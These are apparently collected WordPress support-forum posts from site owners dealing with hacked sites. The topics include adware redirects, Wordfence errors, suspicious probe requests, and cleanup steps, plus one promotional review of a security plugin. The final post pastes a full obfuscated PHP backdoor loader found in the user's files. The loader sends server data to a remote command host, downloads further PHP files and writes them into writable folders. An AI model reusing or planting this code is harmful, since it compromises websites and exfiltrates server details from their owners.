the text in it says “deny from all”
Is this a regular file?
thanks for your help.
]]>Basically a js file is being redirected to adware code. Eg file mydomain.com/wp-content/plugins/example/somefile.js is being redirected to adwaredomain.com/mydomain.com/wp-content/plugins/example/somefile.js
Here are the things Ive tried – Deleteting and reinstalling fresh plugins, themes, wp-content,wp-admin, wp-includes folders. Also replaced all other wp files with fresh ones from latest. Ive installed various antimalware scanners and wordfence. I also have cloudflare WAF.
Ive also check. But there seems to be no suspicious logins on the webserver or SSH. Ive tried to use a new database prefix and fresh install. But the redirect still remains. I cannot remove it. Anyone have any idea what could be comprimised? Im bit new so Ive tried all I know.
]]>my Website was hacked and I cannot conntect my account to Wordfence.
The error is:
We received an error while trying to activate the license with the Wordfence servers: There was an error connecting to the Wordfence scanning servers: cURL error 6: getaddrinfo() thread failed to start
Please try again. If the problem persists, please contact Wordfence Support
I cannot install or update any plugin on my website. Do you have maybe a solution for it?
]]>I’ve never done this before. I’m on bluehost. I’d just bother them but I don’t want to burden them and also they may not know exactly what they are doing so there could be some issues with their mistakes or misunderstandings.
The site I want to start from scratch is my main site. how do I do purge my site to make sure it’s not infected? I already have whatever I can save downloaded, screenshotted, and copy pasted.
any further words of advice?
]]>In the Live Traffic tab in Wordfence I noticed that some coinciding attempts to login were coming from the Netherlands. And I noticed that one of the blocked attempts was this one:
https://delasciencealassiette.fr/ubpxwlwy.php?Fox=d3wL7
Can anyone explain why a .php file different from the usuals “.aws/credentials” or “info.php” or “config.js” attempts?
Can you help me to know what I can do to be assured that there are no infected files that the scan might be missing?
EDIT: I also found all these visitor entries in clicky analytics:
10:28 Brazil flag 187.72.192.0 /ubpxwlwy.php
10:28 The United States flag 72.240.108.0 /ubpxwlwy.php?Fox=d3wL7
10:28 Poland flag 91.150.166.0 /ubpxwlwy.php?Fox=d3wL7
10:28 The United States flag 208.53.243.0 /ubpxwlwy.php?Fox=d3wL7
10:28 The United States flag 205.213.108.0 /ubpxwlwy.php
Grateful
Rod
Thank you.
]]>It’s always a big ordeal to maintain the security of my wp site and I have not found a plugin/service that can keep my sites safe, detect file changes & remove them automatically until I found Shield Security.
This plugin literally does it all, if any file is changed or added it notifies you & with the scanner running every hour I never miss a malware injection.
It scans and monitors WordPress core files for changes, files for malware infections, and plugin & theme files for changes. THEN you can set it to AUTOMATICALLY delete these unrecognized files. What?!? How perfect is that!
I just went in and removed all my other security plugins (malcare pro, wordfence, sucuri pro, Anti-Malware from GOTMLS.NET) because I am so sold on Shield Security Pro.
It literally does everything and can I say that the pricing model is UNBEATABLE!
I also need to mention that their customer support is also literally the BEST that I have ever encountered with any security/any product. I had a big issue I needed hands-on help with and they happily helped me with everything. They are so knowledgeable, down-to-earth, and kind. Such a great experience.
This product has really been a lifesaver go try the week free trial or just buy the subscription, it’s a no brainer!
]]>How do I use the plugin to identify what the threat actually is? This might help me identify where the hole in my security is.
Steps I’ve performed:
-Reinstalling WP Core
-Reinstalling all Plugins
-Reinstalling theme
-WordFence scan and deleting or repairing infected files
-Changing passwords for WP and database
-Looking for hidden accounts in the database
-Changing FTP passwords-Removing unauthorized FTP accounts
Here is the malicious code I’m finding in multiple files:
<?php if(!isset($incode)){$vl='h';$serverid='0bdf5b6877cf16717e02642fc9fc250d';$server_addr='219.95.83.119';function o0($oo0o,$oo,$oo0,$oO,$oOo,$ooooO){$o0oo0='Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0';if(ini_get('allow_url_fopen')==1){$o000=stream_context_create(array($ooooO=>array('method'=>'POST','timeout'=>$oOo,'header'=>array('Content-type: application/x-www-form-urlencoded','User-Agent: '.$o0oo0,'content'=>http_build_query($_SERVER)))));if($oO=='yes'){$oo0o=$oo0o.'&type=fopen';}$ooo=@file_get_contents($oo0o,false,$o000);}elseif(in_array('curl',get_loaded_extensions())){if($oO=='yes'){$oo0o=$oo0o.'&type=curl';}$oo00O=curl_init();curl_setopt($oo00O,CURLOPT_URL,$oo0o);curl_setopt($oo00O,CURLOPT_HEADER,false);curl_setopt($oo00O,CURLOPT_RETURNTRANSFER,true);curl_setopt($oo00O,CURLOPT_TIMEOUT,$oOo);curl_setopt($oo00O,CURLOPT_USERAGENT,$o0oo0);if($ooooO=='https'){curl_setopt($oo00O,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($oo00O,CURLOPT_SSL_VERIFYHOST,false);}curl_setopt($oo00O,CURLOPT_CONNECTTIMEOUT,5);curl_setopt($oo00O,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ooo=@curl_exec($oo00O);curl_close($oo00O);}else{if($oO=='yes'){$oo0=$oo0.'&type=socks';}if($ooooO=='https'){$ooO=fsockopen('ssl://'.$oo,443,$o0Ooo,$oO0,$oOo);}else{$ooO=fsockopen($oo,80,$o0Ooo,$oO0,$oOo);}if($ooO){stream_set_timeout($ooO,$oOo);$oO0Oo=http_build_query($_SERVER);$o0O='POST '.$oo0.' HTTP/1.0'."\r\n";$o0O.='Host: '.$oo."\r\n";$o0O.='User-Agent: '.$o0oo0."\r\n";$o0O.='Content-Type: application/x-www-form-urlencoded'."\r\n";$o0O.='Content-Length: '.strlen($oO0Oo)."\r\n\r\n";fwrite($ooO,$o0O);fwrite($ooO,$oO0Oo);$oooO='';while(!feof($ooO)){$oooO.=fgets($ooO,4096);}fclose($ooO);list($ooOO,$oO0oo)=@preg_split("/\R\R/",$oooO,2);$ooo=$oO0oo;}}return$ooo;}function ooO($o0OO){$o0oo[0]=(int)($o0OO/256/256/256);$o0oo[1]=(int)(($o0OO-$o0oo[0]*256*256*256)/256/256);$o0oo[2]=(int)(($o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256)/256);$o0oo[3]=$o0OO-$o0oo[0]*256*256*256-$o0oo[1]*256*256-$o0oo[2]*256;return''.$o0oo[0].".".$o0oo[1].".".$o0oo[2].".".$o0oo[3];}function o0O00($o0o0){$o0Oo=array();$o0Oo[]=$o0o0;foreach(scandir($o0o0) as$oo00){if($oo00=='.'||$oo00=='..'){continue;}$oOO0=$o0o0.DIRECTORY_SEPARATOR.$oo00;if(is_dir($oOO0)){$o0Oo[]=$oOO0;$o0Oo=array_merge($o0Oo,o0O00($oOO0));}}return$o0Oo;}$oOoo=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oo=ooO('3104709758');$oo0='/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0o='https://'.$oo.'/get.php?spider&checkdomain&host='.$oOoo.'&serverid='.$serverid.'&stookfile='.__FILE__;$oo0OO=o0($oo0o,$oo,$oo0,$oO='no',$oOo='30',$ooooO='http');if($oo0OO!='havedoor|havedonor'){$o0=$_SERVER['HTTP_HOST'];$oo0O=@preg_replace('/^www\./','',$_SERVER['HTTP_HOST']);$oO00=$_SERVER['DOCUMENT_ROOT'];chdir($oO00);$o0Oo=o0O00($oO00);$o0Oo=array_unique($o0Oo);foreach($o0Oo as$oo00){if(is_dir($oo00)&&is_writable($oo00)){$o0O0o=explode(DIRECTORY_SEPARATOR,$oo00);$oOo0=count($o0O0o);$oOoOo[]=$oOo0.'|'.$oo00;}}$oOo0=0;foreach($oOoOo as$ooo0){if(count($oOoOo)>1&&(strstr($ooo0,'/wp-admin')||strstr($ooo0,'/cgi-bin'))){unset($oOoOo[$oOo0]);}$oOo0++;}if(!is_writable($oO00)){natsort($oOoOo);$oOoOo=array_values($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];}else{$ooo0=$oO00;}chdir($ooo0);if(stristr($oo0OO,'nodoor')){$oo0o='https://'.$oo.'/get.php?vl='.$vl.'&update&needfilename';$oo0='/get.php?vl='.$vl.'&update&needfilename';$o0o=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');$oo0oO=explode('|||||',$o0o);$oOoOO=$oo0oO[0].'.php';$o00o=$oo0oO[1];file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$o00o);$o00=str_replace($oO00,'',$ooo0);if($_SERVER['SERVER_PORT']=='443'){$ooooO='https';}else{$ooooO='http';}$oo0o=$ooooO.'://'.$o0.$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$oo0=$o00.'/'.$oOoOO.'?gen&serverid='.$serverid;$ooOoO=o0($oo0o,$o0,$oo0,$oO='no',$oOo='55',$ooooO);}elseif(stristr($oo0OO,'needtoloadsomefiles')){shuffle($oOoOo);$ooo0=explode('|',$oOoOo[0]);$ooo0=$ooo0[1];$o00=str_replace($oO00,'',$ooo0);$o0oO='stuvwxyz';$oOoOO=str_shuffle($o0oO).'.php';$ooOo=urlencode($ooooO.'://'.$o0.$o00.'/'.$oOoOO);$oo0o='https://'.$oo.'/get.php?bdr&url='.$ooOo;$oo0='/get.php?bdr&url='.$ooOo;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='20',$ooooO='http');file_put_contents($ooo0.DIRECTORY_SEPARATOR.$oOoOO,$ooo);}elseif(stristr($oo0OO,'needtoloadclient')){$oo0o='https://'.$oo.'/get.php?getclient&domain='.$oo0O;$oo0='/get.php?getclient&domain='.$oo0O;$ooo=o0($oo0o,$oo,$oo0,$oO='no',$oOo='55',$ooooO='http');if($ooo!='noclient'){$oOO0o=explode('::::',$ooo);$ooO0=$oOO0o[0];$ooOOO=$oOO0o[1];if(file_exists($ooO0)){if(!is_writable($ooO0)){@chmod($ooO0,'0644');@file_put_contents($ooO0,$ooOOO);if(!is_writable($ooO0)){@unlink($ooO0);@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}else{@file_put_contents($ooO0,$ooOOO);}}}elseif($oo0OO=='needtowait'){}if(stristr($oo0OO,'nodonor')){}}$incode=1;}?><?php